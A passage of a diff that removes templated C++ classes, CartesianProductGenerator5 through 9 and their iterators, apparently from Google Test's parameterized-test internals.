-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator5::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator5& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-};  // class CartesianProductGenerator5
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-class CartesianProductGenerator6
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5,
-        T6> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6> ParamType;
-
-  CartesianProductGenerator6(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6) {}
-  virtual ~CartesianProductGenerator6() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current6_;
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator6::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator6& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-};  // class CartesianProductGenerator6
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-class CartesianProductGenerator7
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7> ParamType;
-
-  CartesianProductGenerator7(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7) {}
-  virtual ~CartesianProductGenerator7() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current7_;
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator7::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator7& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-};  // class CartesianProductGenerator7
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-class CartesianProductGenerator8
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7, T8> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8> ParamType;
-
-  CartesianProductGenerator8(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7,
-      const ParamGenerator<T8>& g8)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7),
-          g8_(g8) {}
-  virtual ~CartesianProductGenerator8() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin(), g8_, g8_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end(), g8_,
-        g8_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7,
-      const ParamGenerator<T8>& g8,
-      const typename ParamGenerator<T8>::iterator& current8)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7),
-          begin8_(g8.begin()), end8_(g8.end()), current8_(current8)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current8_;
-      if (current8_ == end8_) {
-        current8_ = begin8_;
-        ++current7_;
-      }
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_ &&
-          current8_ == typed_other->current8_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_),
-        begin8_(other.begin8_),
-        end8_(other.end8_),
-        current8_(other.current8_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_, *current8_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_ ||
-          current8_ == end8_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    const typename ParamGenerator<T8>::iterator begin8_;
-    const typename ParamGenerator<T8>::iterator end8_;
-    typename ParamGenerator<T8>::iterator current8_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator8::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator8& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-  const ParamGenerator<T8> g8_;
-};  // class CartesianProductGenerator8
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-class CartesianProductGenerator9
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7, T8, T9> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9> ParamType;
-
-  CartesianProductGenerator9(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7,
-      const ParamGenerator<T8>& g8, const ParamGenerator<T9>& g9)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9) {}
-  virtual ~CartesianProductGenerator9() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin(), g8_, g8_.begin(), g9_, g9_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end(), g8_,
-        g8_.end(), g9_, g9_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7,
-      const ParamGenerator<T8>& g8,
-      const typename ParamGenerator<T8>::iterator& current8,
-      const ParamGenerator<T9>& g9,
-      const typename ParamGenerator<T9>::iterator& current9)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7),
-          begin8_(g8.begin()), end8_(g8.end()), current8_(current8),
-          begin9_(g9.begin()), end9_(g9.end()), current9_(current9)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current9_;
-      if (current9_ == end9_) {
-        current9_ = begin9_;
-        ++current8_;
-      }
-      if (current8_ == end8_) {
-        current8_ = begin8_;
-        ++current7_;
-      }
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_ &&
-          current8_ == typed_other->current8_ &&
-          current9_ == typed_other->current9_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_),
-        begin8_(other.begin8_),
-        end8_(other.end8_),
-        current8_(other.current8_),
-        begin9_(other.begin9_),
